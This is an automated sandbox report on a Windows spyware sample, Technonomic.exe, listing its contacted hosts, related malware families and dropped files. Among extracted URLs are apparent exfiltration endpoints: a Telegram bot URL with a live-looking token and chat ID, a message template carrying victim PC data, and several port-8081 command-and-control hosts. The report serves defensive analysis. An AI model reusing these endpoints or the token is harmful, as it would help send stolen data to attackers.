https://duckduckgo.com/ac/?q=	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.office.com/lB	msiexec.exe, 00000007.00000002.2620412422.00000000259D8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	Technonomic.exe, Technonomic.exe.2.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000007.00000002.2620412422.00000000259AC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070	msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20a	msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000007.00000002.2606714921.0000000009EEE000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000007.00000002.2620412422.00000000259A7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025865000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258AA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp	false	high
http://api.telegram.org	msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000007.00000002.2620412422.000000002583B000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.217.19.238	drive.google.com	United States	15169	GOOGLEUS	false
142.250.181.1	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580360
Start date and time:	2024-12-24 11:26:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Technonomic.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/16@5/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 89 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7192 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Technonomic.exe

Simulations

Behavior and APIs

Time	Type	Description
05:27:07	API Interceptor	43x Sleep call for process: powershell.exe modified
05:28:28	API Interceptor	917x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	tg.exe	Get hash	malicious	Babadeda	Browse
	tg.exe	Get hash	malicious	Babadeda	Browse
	setup.exe	Get hash	malicious	Babadeda	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse
	8v1GZ8v1LF.exe	Get hash	malicious	Unknown	Browse
193.122.6.168	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
172.67.177.134	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse
	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
s-part-0035.t-0009.t-msedge.net	http://au.kirmalk.com/watch.php?vid=7750fd3c8	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531	Get hash	malicious	Unknown	Browse	13.107.246.63
	pwn.dll.dll	Get hash	malicious	CobaltStrike	Browse	13.107.246.63
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	2S5jaCcFo5.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	QDQXUZhiY3.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	https://en.newsnowbangla.com/archives/69912	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	13.107.246.63
	https://flowto.it/8tooc2sec?fc=0	Get hash	malicious	Unknown	Browse	13.107.246.63
	Onboard Training Checklist v1.1 - Wyatt Young (1).xlsx	Get hash	malicious	Unknown	Browse	13.107.246.63
	vFile__0054seconds__Airborn.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
api.telegram.org	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	8v1GZ8v1LF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
reallyfreegeoip.org	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	splm68k.elf	Get hash	malicious	Unknown	Browse	129.147.168.111
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	nshkmips.elf	Get hash	malicious	Mirai	Browse	132.145.36.70
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
TELEGRAMRU	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	9EI7wrGs4K.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
CLOUDFLARENETUS	fnCae9FQhg.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	bG89JAQXz2.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	SFtDA07UDr.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	162.159.128.70
	https://office356quilter.krkonqghz.ru/Vt2VD2f3#https://outlookofficecom/mail/deleteditems/id/AAQkADU5#aGVpZGkuZGlsa0BxdWlsdGVyLmNvbQ==	Get hash	malicious	Unknown	Browse	104.21.17.63
	http://au.kirmalk.com/watch.php?vid=7750fd3c8	Get hash	malicious	Unknown	Browse	172.67.207.202
	eCompleted_419z.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	172.67.157.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	149.154.167.220
	Gq48hjKhZf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	singl6.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220
	hnskdfgjgar22.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WO.exe	Get hash	malicious	Metasploit	Browse	149.154.167.220
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	149.154.167.220
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	1lhZVZx5nD.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	installer.msi	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.181.1 172.217.19.238
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238
	3gPZmVbozD.msi	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	142.250.181.1 172.217.19.238
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	142.250.181.1 172.217.19.238
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.238

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	WYnv59N83j.exe	Get hash	malicious	FormBook, GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	WYnv59N83j.exe	Get hash	malicious	GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	AgentTesla, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d5ir0sv.cbg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bl1qt1yp.eo0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e51s02uw.n41.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkoccn4n.udy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.139253382998066
Encrypted:	false
SSDEEP:	96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
MD5:	1B0E41F60564CCCCCD71347D01A7C397
SHA1:	B1BDDD97765E9C249BA239E9C95AB32368098E02
SHA-256:	13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
SHA-512:	B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
